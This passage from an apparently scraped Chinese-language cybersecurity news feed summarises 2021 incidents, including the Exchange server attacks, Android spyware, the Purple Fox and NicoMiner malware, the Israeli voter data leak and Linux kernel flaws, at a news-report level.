T-Mobile,Verizon和AT&T没有立即回应评论请求。联邦通信委员会(FCC)和CTIA(运营商的贸易机构)也没有回应评论请求。上周,Motherboard公布了一项调查,其中假名Lucky225的黑客向一家名为Sakari的公司支付了一小笔钱,以证明这个问题,此前并没有详细报道。Sakari是一家帮助企业进行短信营销和群发信息的公司。作为其中的一部分,Sakari从另一家名为Bandwidth的公司获得了短信改道的能力,而Bandwidth又从另一家名为NetNumber的公司获得了这种能力。 当输入相应的电话号码时,Lucky225被要求签署一份文件,基本上是用小指头发誓确保目标已同意短信改道。Lucky225真实身份是网络安全公司Okey Systems的首席信息官,在输入Motherboard提供的电话号码几分钟后,Lucky225就开始收到原本要发给Motherboard手机的短信。从这里,Lucky225登录了各种使用短信作为登录或认证机制的服务。 不难看出,这种攻击对安全保障造成的巨大威胁。美国联邦通信委员会必须利用其权力迫使电话公司保护其网络免受黑客攻击。对此,Sakari公司联合创始人Adam Horsman表示,Sakari推出了一项安全功能,输入的号码会收到一个自动呼叫,以确保号码所有者同意信息改道。现在,随着运营商切断手机号码短信的启用,广大的商业短信公司生态系统很可能根本无法
2021-03-29 10:16:33hackernews.cc
许多企业内部的Exchange服务器正在忙着打补丁,但微软警告说,调查发现,在已经被入侵的系统上潜伏着多种威胁。攻击者惯常使用Web Shell脚本来获得服务器上的持久权限,或者攻击者在早期的攻击中就已经窃取了凭证。微软在3月2日发布了Exchange内部系统的补丁。四个Exchange错误已经受到了一个名为Hafnium的国家支持的黑客组织的攻击。 微软本周早些时候表示,已经检测到92%的脆弱的Exchange服务器已经打了补丁或采取了缓解措施。然而,网络安全公司F-Secure表示,已经有 “数万台”Exchange服务器被入侵。 在一篇新的博客文章中,微软重申了它的警告,即 “给系统打补丁并不一定能消除攻击者的访问”。”许多被入侵的系统还没有收到二次行动,例如人为操作的勒索软件攻击或数据外流,这表明攻击者可能正在建立和保留他们的访问权限,以便以后的潜在行动,”微软365 Defender威胁情报团队指出。 在系统被入侵的地方,微软敦促管理员实践最小特权原则,减轻网络上的横向移动。最低权限将有助于解决常见的做法,即Exchange服务或计划任务已被配置为具有高级权限的帐户来执行备份等任务。”由于服务账户凭证不会经常改变,这可以为攻击者提供很大的优势,即使他们由于防病毒检测而失去了最初的Web Shell访问,因为该账户可以用于以后提升权限,”微软指出。 以DoejoCrypt勒索软件(又名DearCry)为例,微软指出,该病毒株使用的web shell会将一个批处理文件写入C:\Windows\Temp\xx.bat。这在所有被DoejoCrypt击中的系统中都被发现,并且可能为攻击者提供了一条重新获得访问的途径,在那里感染已经被检测和删除。 “这个批处理文件会执行安全账户管理器(SAM)数据库以及系统和安全注册表蜂巢的备份,允许攻击者稍后访问系统上本地用户的密码,更关键的是,在注册表的LSA[本地安全]部分,那里存储着服务和计划任务的密码,”微软指出。 即使在受害者没有被勒索的情况下,攻击者使用特殊设计后的xx.bat批处理文件也可以通过当初投放该文件的Web Shell设法继续访问。在下载勒索软件载荷和加密文件之前,Web Shell还会协助下载Cobalt Strike渗透测试套件。换
2021-03-29 10:16:33hackernews.cc
安全研究人员表示,一种强大的新型Android恶意软件伪装成关键的系统更新,可以完全控制受害者的设备,并窃取他们的数据。该恶意软件被发现捆绑在一个名为 “系统更新 “的应用中,必须在Android设备的应用商店Google Play之外安装。 一旦用户安装后,该应用就会隐藏并隐秘地将受害者设备中的数据发送到的自己控制的服务器。发现该恶意应用的移动安全公司Zimperium的研究人员表示,一旦受害者安装了该恶意应用,该恶意软件就会与运营商的Firebase服务器进行通信,用于远程控制设备。 该间谍软件可以窃取信息、联系人、设备细节、浏览器书签和搜索历史记录,从麦克风记录通话和环境声音,并使用手机摄像头拍照。该恶意软件还可以跟踪受害者的位置,搜索文档文件,并从设备的剪贴板上抓取复制的数据。 恶意软件隐藏在受害者身边,并试图通过向攻击者的服务器上传缩略图而不是完整的图像来减少网络数据的消耗,从而逃避捕获。该恶意软件还能捕获最新的数据,包括位置和照片。 Zimperium首席执行官Shridhar Mittal表示,该恶意软件很可能是定向攻击的一部分。诱骗别人安装恶意应用是一种简单但有效的方法,可以危害受害者的设备。这就是为什么安卓设备会警告用户不要安装应用商店以外的应用。但许多旧设备并不能运行最新的应用,迫使用户依赖来自盗版应用商店的旧版应用。             (消息及封面来源:cnBeta)  
2021-03-26 11:54:15hackernews.cc
本月对于 IT 管理员来说是非常忙碌的,因为他们不得不尽快对内部的 Exchange Server 实例部署补丁。不过在政府的高度重视、微软的积极引导下,现在情况有所好转。微软今天宣布,92% 易受攻击的 Exchange IP 均已部署补丁或者得到缓解。 微软安全响应中心(MSRC)今天发布推文,表示 Exchange Server 实例被修复的势头强劲。在推文中写道:“我们的工作仍在继续,但是我们看到内部 Exchange 服务器更新的强劲势头。全球92%的 Exchange IP 已经打上补丁或得到缓解。上周全球范围改善了 43%” 。 从上图可以看到,还有将近 3 万个实例并没有被打上补丁。根据 RiskIQ 的遥测数据,在微软自 3 月 1 日以来观察到的 40 万个实例中,约占 8%。除了 IT 管理员的努力外,显著的减少可以归功于微软在过去几周内发布的多个建议,以及它在 Microsoft Defender 中引入的一键工具和自动缓解功能。 该公司还发布了对不再支持的预置Exchange Server实例的带外更新。剩下的实例需要多长时间才能打上补丁还有待观察,但微软可能会寄希望于未来几周持续的势头,以便实现这一目标。         (消息来源:cnBeta;封面源自网络)
2021-03-25 14:13:48hackernews.cc
在第一篇中,我们突出了相关侦察步骤!在本文中,我们深入研究了IDA历险,更好地了解imgdecrypt如何操作,以确保最新路由器型号的固件完整性。 将二进制文件加载到IDA中时,将会出现一个功能列表。我们已经发现二进制代码应该是从调试符号中剥离出来的,使得调试整个代码变得较为困难,但从IDA提供给我们的方式来看,它还是相当不错的。 … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1524/           消息来源:Low-level adventures,译者:小江; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文链接
2021-03-25 10:13:32hackernews.cc
据外媒报道,当地时间周一,数百万名以色列公民的选民登记和个人信息在网上被泄露,两天之后,该国将举行一院制议会的大选。曝光的资料波及到6528565名以色列人的选民登记详细资料和以色列约930万总人口中3179313人的个人详细资料。后者包括了全名、电话号码、身份证号码、家庭住址、性别、年龄和政治倾向等细节。 据以色列媒体报道,一名自称为The Israeli Autumn的威胁分子称对此事负责。 以色列威胁情报公司KELA的产品经理Raveed Laeb在周三媒体采访时表示,自周一以来,这些数据已经被多个电报频道广泛分享。此前,他在泄露的文件中发现了自己的个人信息。 目前,数据泄露源头已被锁定为Elector–一个为Elector Software for Likud公司开发的同名应用的网站。Likud(利库德集团)是以色列现任总理本雅明·内塔尼亚胡领导的政党。 2020年2月,一位名叫Ran Bar-Zik的以色列网页开发者发现,该应用的网站暴露了一个API端点,该端点允许他获得该网站管理员及其帐户详细信息的列表,其中包括密码。 Bar-Zik称,通过利用这些密码,他能访问一个包含以色列选民个人信息的数据库。 Bar-Zik在一篇博文中详细阐述了他的发现,这在2020年初引发了以色列的一场重大媒体丑闻,因为尽管出于政治竞选计划等原因政党可以访问以色列的全部选民数据库,但他们不应该跟第三方分享这些数据。当时,Bar-Zik向该应用网站的开发公司报告了这一情况,但网站开发者警告称,目前尚不清楚其他各方是否在他之前发现了同样的问题,也不清楚他们是否利用API获取了以色列公民的选民登记数据。 在该国最新一轮选举前几天公布的数据显示,Bar-Zik的困境似乎在本周得到了解决。几位以色列政治专家本周提出的理论认为,泄露这些数据可能是为了损害利库德集团的公众形象和信任,然而,由于利库德集团有望在2021年3月的议会选举中获胜,所以此次的泄密似乎并没有产生任何的影响。           (消息及封面来源:cnBeta)
2021-03-24 12:12:55hackernews.cc
最近,我们发现了一些无法解压的D-Link路由器的固件样本。通过分析类似的更旧、更便宜的设备(DIR882),我们可以找到一种破解固件加密的方法,以防止篡改和静态分析。本系列文章重点介绍了编写自定义解密例程的结果和必要步骤,该例程也可用于其他模型,后续会对此进行更多介绍。 … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1523/           消息来源:Low-level adventures,译者:小江; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文链接
2021-03-24 10:12:47hackernews.cc
早在 2018 年,安全研究人员就已经发现了后被命名为 Purple Fox 的 Rootkit 恶意软件,起初攻击者主要利用网络钓鱼电子邮件和漏洞利用工具包进行传播。然而 Guardicore 安全研究人员 Amit Serper 和 Ophir harpaz 在一篇博客文章中指出:在利用了一种全新的感染技术之后,该恶意软件已能够在 Windows 设备间更迅速地传播,且僵尸网络的规模也在不断增长。 研究人员指出,该恶意软件正在对使用弱密码和面向互联网的 Windows 计算机发起新一轮攻击。此外通过利用新的感染技术,其传播速度也得到了极大的增强。 具体说来是,该恶意软件通过针对服务器信息块(简称 SMB)来猜测 Windows 用户帐户的弱密码,进而使 Windows 与其它设备(例如打印机和文件服务器)进行通信和达成传播感染的目的。 一旦获得了易受攻击的计算机的访问权,Purple Fox 就会从将近 2000 台较旧且受感染的 Windows Web 服务器网络中,提取恶意负载并悄悄安装 Rootkit、让恶意软件持久锚定在计算机上,同时更加难以被发现、检测和删除。 研究人员指出,一旦被感染,该恶意软件就会关闭最初用于感染计算机的防火墙端口,这或许可阻止重复感染、或避免被其它攻击者入侵并劫持受害者的计算机。 之后,该恶意软件会生成一份 Internet 地址列表,扫描网络上具有弱密码的易受攻击的设备,以进一步感染和创建一个不断扩大的僵尸网络。 通常情况下,黑客会利用僵尸网络来发起 DDoS 攻击,但也可以用于散播恶意软件和垃圾邮件、或在受感染的计算机上部署加密劫持用户文件的勒索软件。 Guardicore 北美安全研究副总裁 Amit Serper 表示,由于自身传播的能力较强,蠕虫僵尸网络对受害者造成的风险也更大。相较于此前的网络钓鱼和漏洞利用工具包,蠕虫感染技术的“运营成本”也更低。 作为一种“机会主义”的攻击形式,它会不断扫描互联网并寻找更易受攻击的机器,意味着攻击者可以一劳永逸。 根据 Guardicore 的互联网传感器监测数据,自 2020 年 5 月以来,Purple Fox 的感染率已飙升 600%,且实际数量可能会更高(过去一年总计超狗 90000 感染)。             (消息及封面来源:cnBeta)
2021-03-23 14:12:21hackernews.cc
Kek Security (Keksec)是一个极为活跃的黑客组织,Checkpoint和Netlab360的报告都对其进行了详细分析。Keksec利用多个漏洞,使用多态工具(包括Linux和Windows有效负载)自定义python恶意软件以攻击多个架构。目前该黑客组织正在积极构建IRC僵尸网络,用于DDoS攻击和勒索活动。本文详细介绍了Keksec利用的工具和使用的策略,以及相关黑客的信息。 … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1520/     消息来源:Lacework, 译者:小江; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文链接
2021-03-23 10:32:13hackernews.cc
据外媒报道,美检察官和法庭记录显示,一名俄罗斯男子在美国认罪,他曾向特斯拉一名员工提供100万美元让其用勒索软件将特斯拉位于内华达州的大型电动电池工厂的网络瘫痪,另外还借此盗取该公司的机密信息以进行进一步的敲诈勒索。 Egor Igorevich Kriuchkov于当地时间周四在美国地方法院认罪。网络安全专家称Kriuchkov承担的风险是特殊的。法院为其指定的联邦公设辩护律师Chris Frey拒绝对外界置评。 美检察官指控Kriuchkov代表国外同谋者试图通过面对面的贿赂来招募一名内部人员来植入勒索软件。据悉,这种软件会破坏目标网络上的数据,其只有通过攻击者提供的软件密钥才能解锁。通常情况下,从安全的避风港操作的勒索软件团伙会通过互联网侵入受害者的网络并在激活勒索软件之前下载数据。 对此,杀毒软件公司EMSIsoft网络安全分析师Brett Callow评论道:“他们冒这样的风险或许可以表明,这是一次旨在获取信息的情报行动,而非旨在获取金钱的勒索行动…也有可能是犯罪分子认为赌博是值得的并决定掷骰子。” 网络安全公司FireEye首席技术官Charles Carmakal对此表示赞同。他说道:“你可以在几千英里以外的地方进行,而这不需要承担任何资产风险。” FBI表示,这名未透露姓名的潜在招募者通知了特斯拉并跟联邦调查局合作从而在造成任何损害之前使得这场阴谋被阻止了。 去年9月,27岁的Kriuchkov告诉法官,他知道俄罗斯政府知道他的案子。但美检察官和FBI没有指控他跟克里姆林宫存在联系。Kriuchkov目前被关押在雷诺的瓦肖县监狱。 Kriuchkov承认故意破坏一台受保护的电脑,这可能使他面临最高5年的监禁和25万美元的罚款。然而根据书面认罪协议,他将只需面临不到10个月的刑期。 自8月在洛杉矶被捕以来,他已经被拘留了7个月。联邦当局称,他当时正前往机场准备飞往国外。 法庭文件还显示,去年7月和8月,Kriuchkov持俄罗斯护照和旅游签证在美国呆了五个多星期,当时他试图招募一名被认定为为电脑安装黑客软件的雇员。这名未被确认身份的员工将收到用数字加密货币比特币支付的款项。 本案中没有其他同谋嫌疑人受到指控。不过根据法庭记录目前还不清楚资金是否易手。           (消息及封面来源:cnBeta)
2021-03-23 10:32:13hackernews.cc
近日,NHS Horizons官员的推特帐户被黑客入侵后被用来宣传PS5。据BBC报道称,NHS Horizons高官Helen Bevan发现她的两个推特帐户遭到了黑客的攻击,黑客在黑入后把头像改成了PS5的标识。 由于Bevan没有开启双重身份验证,帐号在经历了几天后才被找回。找回后Bevan发现在私信中有不少人向她询问关于PS5的具体情况。 在随后的推文中,Bevan表示,她希望其他人引以为戒,在推特账户上开启双重身份验证来避免类似的情况。           (消息及封面来源:cnBeta)
2021-03-19 10:29:32hackernews.cc
昨天,一位研究人员披露了一种在Twitter图片中隐藏多达3MB数据的方法。在他的演示中,研究人员展示了包含在Twitter上托管的PNG图像内的MP3音频文件和ZIP档案。 虽然在图像中隐藏非图像数据的艺术(隐身术)并不新颖,但由于图像可以托管在像Twitter这样的热门网站上,而且没有经过杀毒,这就为其被恶意行为者滥用提供了可能。昨天,研究员兼程序员大卫-布坎南在他的推特上附上了实例图片,这些图片中隐藏着整个ZIP档案和MP3文件等数据。 虽然Twitter上托管的附件PNG文件在预览时代表了有效的图像,但仅仅是下载并改变其文件扩展名就足以从同一个文件中获得不同的内容。据BleepingComputer观察,该研究者在推特上发布的6KB图片包含了整个ZIP档案。该ZIP包含了大卫-布坎南的源代码,任何人都可以用它将杂七杂八的内容打包成PNG图片。 对于那些喜欢稍微不动手的人来说,研究者还在GitHub上提供了生成他所谓的tweetable-polyglot-png文件的源代码。在另一个上传到Twitter上的例子中,Buchanan在推特上发布了一张会唱歌的图片。下载这个,重命名为.mp3,在VLC中打开,变成MP3的图片文件就会开始播放Rick Astley的《Never Gonna Give You Up》这首歌。大卫-布坎南表示,你可以在DEFLATE流(文件中存储压缩像素数据的部分)的末尾附加数据,而Twitter不会将其剥离。 隐身威胁行为者经常利用隐身技术,因为他们可以将恶意命令、有效载荷和其他内容隐藏在图像等看似普通的文件中。就在昨天,BleepingComputer报道了一种新的渗透技术,网络犯罪分子利用这种技术将被盗的信用卡数据隐藏在JPG图片中。正如大卫-布坎南所展示的那样,Twitter可能并不总是将无关信息从图片中剥离出来,这一事实为威胁行为者滥用该平台提供了空间。             (消息及封面来源:cnBeta)
2021-03-19 10:09:22hackernews.cc
9to5Mac 报道称:一项针对去年野外发现的新恶意软件的研究表明,macOS 的威胁形势发生了巨大的变化,几乎较 2019 年增加了 1100% 。这项由 Atlas 和 AV-Test 联手开展的调查表明,Mac 用户平均每天面临 1847 个新增威胁。不过结合上下文,可知与同时期 Windows 平台相比,其数量仍不到总威胁的 1% 。 本次调查涉及 Mac 平台的 67 万 4273 个新恶意软件,算是自 2019 年以来的首次大爆发(+1092%)。 作为对比,去年调查发现的新 Mac 恶意软件总数仅为 55556 个,2018 年为 92570 个、2017 年为 28949 个、2016 年更是只有 5208 个。 Atlas 表示,促成 2020 年 macOS 恶意软件数量暴涨的一个主要因素,是因为新恶意软件的工程设计已较以往变得更加容易。 现如今,许多黑客已不需要太高级的编程技能,甚至可以直接购买到现成的代码,然后一键定制出新的恶意软件。 有趣的是,2021 开年至今(3 月中旬),macOS 新增恶意软件的数量反而没有多大的动静(仅为 2474 个)。 至于 Windows 平台,研究发现 2020 年度增加了超过 9100 万个新威胁,是 macOS 威胁的 135 倍以上,平均每天有将近 25 万个新的 Windows 恶意软件。 甚至在 2021 一季度结束前,Windows 平台上就已经遭遇了超过 3300 万个新的恶意软件威胁。           (消息及封面来源:cnBeta)
2021-03-18 12:08:46hackernews.cc
摘要 NicoMiner利用三个漏洞入侵传播: Hadoop Yarn未授权访问漏洞 PostgreSQL未授权漏洞 PostgreSQL提权代码执行漏洞(CVE-2019-9193); 利用漏洞入侵成功后会针对Windows、Linux系统分别投放门罗币矿机; 感染量增长较快,一个月内翻倍,受害服务器约3000台; 针对Windows、Linux两个平台的挖矿木马使用相同的钱包; 关联分析发现疑似作者ID:Nico Jiang; 通过腾讯安图查询历史情报,发现作者疑似从事刷量相关的黑产记录。   一、概述 腾讯安全威胁情报中心捕获一起快速增长的挖矿木马NicoMiner,该木马通过Hadoop Yarn未授权访问漏洞、PostgreSQL未授权及提权代码执行漏洞(CVE-2019-9193)进行入侵攻击,会根据操作系统不同分别植入Windows和Linux平台的门罗币挖矿木马。 由于攻击者使用的域名和样本PDB信息中包含“nico jiang”的ID信息,腾讯安全威胁情报中心将该挖矿木马命名为NicoMiner。根据该挖矿木马使用的钱包算力推算,该木马在近一个月内感染量已翻倍,估计受害服务器已达3000台左右。 进一步溯源分析还发现,“nico jiang”在较早时候已从事黑灰产业,该ID陆续注册了与游戏推广、刷量黑灰产有关的域名,近期启用之前留置的相关网络资源从事挖矿黑产。也不排除近期可能有其他黑客掌控 “nico jiang”曾经注册的相关域名和开发设备,用来制作、传播NicoMiner挖矿木马。 腾讯安全全系列产品已支持对NicoMiner挖矿木马攻击传播的各个环节进行检测防御: 排查和加固 由于NicoMiner挖矿木马的攻击呈现明显增长趋势,腾讯安全专家建议企业客户参考以下步骤对系统进行排查和加固: 1.删除进程和文件: 文件: /*/pgsql-*/data/java.* /*/pgsql/data/java.* /*/postgres/*/data/LinuxTF /tmp/java Windows系统 c:\postgresql\*\data\conhost.exe c:\postgresql\*\data\sqltools.exe c:\windows\temp\st.exe c:\program files\postgresql\data\pg*\sqltools.exe 检查CP
2021-03-18 10:08:46hackernews.cc
网络检测和响应公司Vectra AI的最新研究显示,由于COVID-19,88%的公司已经加快了云和数字化转型项目。但它还发现,71%的Office 365用户遭遇恶意账户接管。 令人担忧的是,只有三分之一的安全专业人员认为他们可以立即识别和阻止账户接管攻击,大多数人预计需要几天甚至几周的时间来拦截这种违规行为。Vectra公司CTO团队技术总监Tim Wade说:”我们经常看到基于身份的攻击被用来绕过传统外围防御,如多因素认证(MFA)。帐户接管正在取代网络钓鱼成为最常见的攻击载体,而MFA防御系统现在已经变成减速带,而无法阻止攻击。组织需要认真对待这一点,并计划在业务发生实质性中断之前检测和控制账户泄露。恶意访问,即使是短时间的,也会造成巨大的损失。” 安全团队对自己公司安全措施有效性有很高的信心。近五分之四的人声称对绕过防火墙等外围防御的攻击有良好或非常好的可视性。然而,管理层受访者和SOC分析师等从业人员之间的意见存在有趣的对比,管理人员对自己的防御能力表现出更大的信心。总的来说,微软Office365客户提到的最主要的安全问题是云端保存的数据被泄露的风险、账户被接管的风险以及黑客隐藏行踪的能力。 经理们明显比那些在工作场所进行具体工作的人更有信心,这里有一定程度的自欺欺人,也许是因为与高级管理层分享的指标往往更多关注的是被阻止的攻击量,而不是攻击的严重性或达成确定结论的调查数量。不管是什么原因,重要的是不要自满,要对新类型的攻击保持持续的警惕。           (消息及封面来源:cnBeta)
2021-03-17 11:08:13hackernews.cc
据外媒报道,去年夏天,美坦帕市青少年 Graham Ivan Clark控制了数个知名Twitter账号并利用它们索要了价值10万多美元的比特币。当地时间周二,他承认了这些指控并被判三年监禁。Clark在跟检察官达成的一项协议中同意服刑3年,之后则还有3年缓刑。 Clark在17岁的时候被指控策划了一场社交媒体网络攻击,一些全球最耳熟能详的名字–包括美总统拜登、前美国总统奥巴马、埃隆·马斯克、坎耶·维斯特、比尔·盖茨、沃伦·巴菲特、迈克·布隆伯格、杰夫·贝佐斯、弗洛伊德·梅威瑟、金·卡戴珊等名人及苹果、Uber等公司。 该协议允许现年18岁的Clark被判为“青少年罪犯”,这使他避免了至少长达10年的刑期。不过如果Clark违反了缓刑处罚那么他将被强制执行最低刑期。 据悉,他将在一所专为年轻人设立的州立监狱服刑。另外,他可能有资格在一个军事化的新兵训练营中服役一段时间。 希尔斯堡州检察官Andrew Warren在一份声明中说道:“Graham Clark需要对这一罪行负责,其他潜在的诈骗者需要看到后果。在这种情况下,我们能承担这些后果,同时也认识到,我们对任何孩子的目标是,只要有可能则是让他们吸取教训,而非毁掉他们的未来。” 当地时间周二下午,Clark出现在希尔斯伯勒县监狱的虚拟法庭听证会上。自被捕以来,他一直被关押在那里。他身穿红色制服,戴着医用口罩,留着平头。 Clark在回答法官Christine Marlewski提出的一系列标准问题时其声音表现得非常单调。他在法庭上认罪并放弃接受审判的权利。除此之外,他几乎没说别的。 辩诉协议的条款要求,在没有得到执法部门许可和监督的情况下,禁止Clark使用电脑。他将不得不接受有关部门对他财产的搜查并交出其控制的所有账号的密码。 Clark的辩护律师David Weisbrod则证实,当事人交出了其获得的所有加密货币。             (消息及封面来源:cnBeta)
2021-03-16 12:27:39hackernews.cc
北京时间3月16日早间消息,据报道,消息人士称,微软将从美国政府获得1.5亿美元的网络安全资金,这占了美国新冠救助资金中用于网络安全防卫的近四分之一。然而,一些立法者对此感到不满,他们并不希望美国政府为这家软件公司提供资金。黑客攻击对国家安全构成重大威胁,这令美国立法者深感挫折,因此美国国会在周四签署的新冠救助法案中配置了网络安全方面的援助资金。 俄勒冈州参议员罗恩·怀登(Ron Wyden)是国会情报委员会的主要民主党人,他说:“微软长期忽视软件设计方面的缺陷,造成了重大漏洞,并被黑客所利用。如果解决这一问题的唯一办法是给微软更多的钱,那么政府需要重新评估对这家公司的依赖。”“对那些向政府销售不安全软件的公司,如果还继续给与更大的政府合同,这样的做法无异于是在奖励这些公司。” 微软此前表示,它将优先修复那些遭到广泛攻击的漏洞。 根据媒体获得的一份美国网络基础设施安全开支计划草案,在6.5亿美元的新资金中,约有1.5亿多美元被用于“安全云平台”的建设。知情人士透露,这笔钱实际上已经编入了微软的预算,主要用于帮助联邦机构升级现有的微软软件,以提高其云系统的安全性。 微软的一项称为“活动日志”的关键服务,允许其客户端监视其所在云中的数据流量,从而发现可能的黑客活动。微软周日表示,尽管其所有云产品都具有安全功能,“但规模较大的组织机构可能需要更先进的功能,比如更深入的安全日志以及调查这些日志并采取行动的能力。” 大多数主要软件都曾经遭到过黑客的攻击,而微软产品的广泛流行性又使其成为了黑客们的首要目标。 许多针对政府机构以及私营公司的攻击是通过操纵微软的系统来进行。 虽然主管网络的一些美国高官认为除了向微软拨款别无选择,但怀登和其他三名立法者已公开对这一拨款计划表示担忧。在2月26日的一场听证会上,针对微软收取额外日志费用的问题,罗得岛州众议员吉姆·兰格文(Jim Langevin)就向微软总裁布拉德·史密斯(Brad Smith)提出了质疑。 兰格文问道:“这究竟是微软的一种盈利方式,还是向客户提供的成本价服务?” 史密斯的回答是:“我们是一家营利性公司。我们所做的一切都是为了产生回报,而不是做慈善。” 微软已经把安全产品变成了一个重要的收入来源,该业务目前每年可为微软带来100亿美元的收入,较以前增长了40%。         (消息及封面来源:cnBeta)
2021-03-16 12:27:39hackernews.cc
Apple Insider 报道称,在拜登政府概述了加强政府网络安全的计划之后,微软也决定在内部开展调查,以明确日益严重的 Exchange 服务器攻击是否源于潜在的漏洞。《华尔街日报》 周一报道指出,这家科技巨头发起了一项专门的调查,以检查“敏感信息”是否经由该公司的某些安全合作伙伴渠道而泄露。 具体说来是,微软正调查是否有人有意或无意地泄露了该公司私下发送给 MAPP 项目成员的概念验证代码。 据悉,MAPP 全称为 Microsoft Active Protections Program,目前已有大约 80 个组织成员。 3 月初的时候,微软发布了针对 Exchange 邮件服务器、正在被积极利用的四个零日漏洞的紧急补丁。 早在今年 1 月,微软就已经发现了这方面的问题。且在补丁发布前的 2 月 23 日,至少与少数几位 MAPP 合作伙伴探讨过概念验证用途的攻击代码。 结果表明,Exchange 攻击中使用的某些工具,与其私有代码具有一定程度的相似性。相关攻击波及全美至少 3 万个机构,其中包括了许多知名企业。 3 月 11 日,一名安全研究人员简要发布了微软的 GitHub 概念验证代码。但在首波攻击发起之后,相关漏洞也很快被其它网络犯罪组织所利用。 尽管该代码很快被移除,但仅一天之后,安全研究人员和联邦机构就开始发出警告,称相关漏洞已被用于在受感染机器上部署勒索软件。   【背景资料】 在 Exchange 邮件服务器漏洞攻击事件爆发之前,微软也曾于 2020 年遭到 SolarWinds 黑客入侵事件的影响。 3 月 12 日,白宫方面分享了新闻界人士和某位政府高级官员之间的谈话内容简报,概述了美国应积极制定相应计划,以应对日益严峻的网络安全事件。 这位高级官员称,拜登政府希望企业在软件构建和采购等方面优先考虑安全性。同时在网络安全的响应上,也应将重点放在与私营企业的更机密合作上。         (消息来源:cnBeta;封面源自网络)
2021-03-15 10:27:04hackernews.cc
通常情况下,基于 Linux 的发行版本要比 Windows 更加安全,但这并不是说就没有漏洞了。近日,网络安全公司 GRIMM 的安全研究人员在 Linux 内核中发现了不少于 3 个漏洞,可以利用这些漏洞可以获得系统的 root 权限。更重要的是,这些漏洞已经存在长达 15 年之久。 这些漏洞(被追踪为 CVE-2021-27363、CVE-2021-27364 和 CVE-2021-27365)存在于内核的 iSCSI 模块中。虽然在默认情况下该模块是没有被加载的,但是 Linux 内核对模块按需加载的支持意味着它可以很容易地被调用到行动中。安全专家在 Red Hat 所有已测试版本和其他发行版本中均存在这些漏洞。 在 GRIMM 博客上,安全研究员 Adam Nichols 表示:“我们在 Linux mainline 内核的一个被遗忘的角落里发现了 3 个BUG,这些 BUG 已经有 15 年的历史了。与我们发现的大多数积满灰尘的东西不同,这些 BUG 依然存在影响,其中一个原来可以作为本地权限升级(LPE)在多个 Linux 环境中使用”。 这些漏洞存在于无法远程访问的代码中,所以无法被黑客远程利用。但这并不意味着它的破坏力不强。Nichols 警告说黑客可以利用这些漏洞发起任何现有的网络威胁,甚至于会让事情变得更加糟糕。可以想象在你的系统中有不信任的用户以 root 权限访问,这是多么的可怕。 在详细介绍这三个漏洞的博文中,Nichols 解释了受影响的系统类型:”为了让这些漏洞暴露在用户区,scsi_transport_iscsi 内核模块必须被加载。当执行创建 NETLINK_ISCSI 套接字的调用时,这个模块会被自动加载。此外,至少有一个 iSCSI 传输必须在 iSCSI 子系统中注册。在某些配置中,当无权限的用户创建 NETLINK_RDMA 套接字时,ib_iser 传输模块将被自动加载。” 正如 SC Media 所解释的那样,这些漏洞已经在以下内核版本中得到修复:5.11.4、5.10.21、5.4.103、4.19.179、4.14.224、4.9.260 和 4.4.260。而其他已经停止支持的内核将不会收到本次安全修复。             (消息及封面来源:cnBeta)
2021-03-12 12:45:15hackernews.cc
微软已经修补了一个关键的零日漏洞,朝鲜黑客正利用这个漏洞以恶意软件为目标对安全研究人员进行攻击。 1月份,谷歌和微软的帖子曝光了这些0day攻击。两篇帖子都说,受朝鲜政府支持的黑客花了数周时间与安全研究人员发展工作关系。为了赢得研究人员的信任,黑客创建了一个研究博客和Twitter角色,他们与研究人员联系,询问他们是否愿意就某个项目进行合作。 最终,假的Twitter资料要求研究人员使用Internet Explorer打开一个网页。那些上钩的人会发现,他们打了完整补丁的Windows 10机器被安装了一个恶意服务和一个内存后门,该后门联系了一个黑客控制的服务器。 微软在周二修补了该漏洞,其编号为CVE-2021-26411, 该安全漏洞被评为危急,只需要低复杂度的攻击代码即可利用。谷歌表示,联系研究人员的人为朝鲜政府工作。微软表示,他们是Zinc的一部分,Zinc是微软对一个威胁组织的称呼,而这个威胁组织更出名的名称是Lazarus。在过去的十年中,Lazarus已经从一个零散的黑客团体转变为一个强大的威胁行为者。 据报道,联合国2019年的一份报告估计,Lazarus和相关团体为该国的大规模杀伤性武器项目创造了20亿美元。Lazarus还与关闭全球电脑的Wannacry蠕虫、无文件的Mac恶意软件、针对ATM的恶意软件以及针对叛逃者的恶意Google Play应用有关。 除了使用利用IE的水洞攻击,针对研究人员的Lazarus黑客还向目标发送了一个Visual Studio项目,据称其中包含验证漏洞的源代码。项目里面藏着定制的恶意软件,可以联系攻击者的控制服务器。 虽然微软将CVE-2021-26411描述为 “Internet Explorer内存破坏漏洞”,但周一的公告称,该漏洞也会影响Edge,这是微软从头开始打造的浏览器,比IE安全得多,但没有报告称漏洞已经主动针对该浏览器的用户。 该补丁作为微软周二更新的一部分。微软总共发布了89个补丁。除了IE漏洞外,Win32k组件中的一个单独的升级权限漏洞也在被主动利用中。补丁将在未来一两天内自动安装。想要立即更新的用户应该进入开始>设置(齿轮图标)>更新与安全>Windows更新安装这些安全补丁。           (消息及封面来源:cnBeta)
2021-03-12 12:45:15hackernews.cc
3 月 2 日,微软面向 Microsoft Exchange Server 2013, 2016 和 2019 紧急发布带外(Out of Band)安全更新,修复了一个预认证的远程代码执行(RCE)漏洞链(CVE-2021-26855、CVE-2021-26857、CVE-2021-26858和CVE-2021-27065)。 黑客可以利用这些漏洞在不知道有效账户凭证的情况下接管任意可访问的 Exchange 服务器。截止发稿为止,目前有超过 5000 台右键服务器检测到了 webshells,超过 6 万个客户受到影响,而欧洲银行业管理局等多个重要机构遭到攻击。 该漏洞最早是由知名漏斗研究专家 Orange Tsai 发现的,他在 2021 年 1 月 5 日向微软报告了这些漏洞。不过根据外媒 Volexity 的报道,有迹象表明早在 1 月 3 日就有黑客利用该漏洞链发起了攻击。因此,如果这些日期是正确的,那么这些漏洞要么是由两个不同的漏洞研究团队独立发现的,要么就是这些漏洞的信息以某种方式被恶意团伙获得。 2021 年 2 月 28 日开始,不断有 Exchange 用户遭到网络攻击,首先是 Tick,然后 LuckyMouse、Calypso 和 Winnti 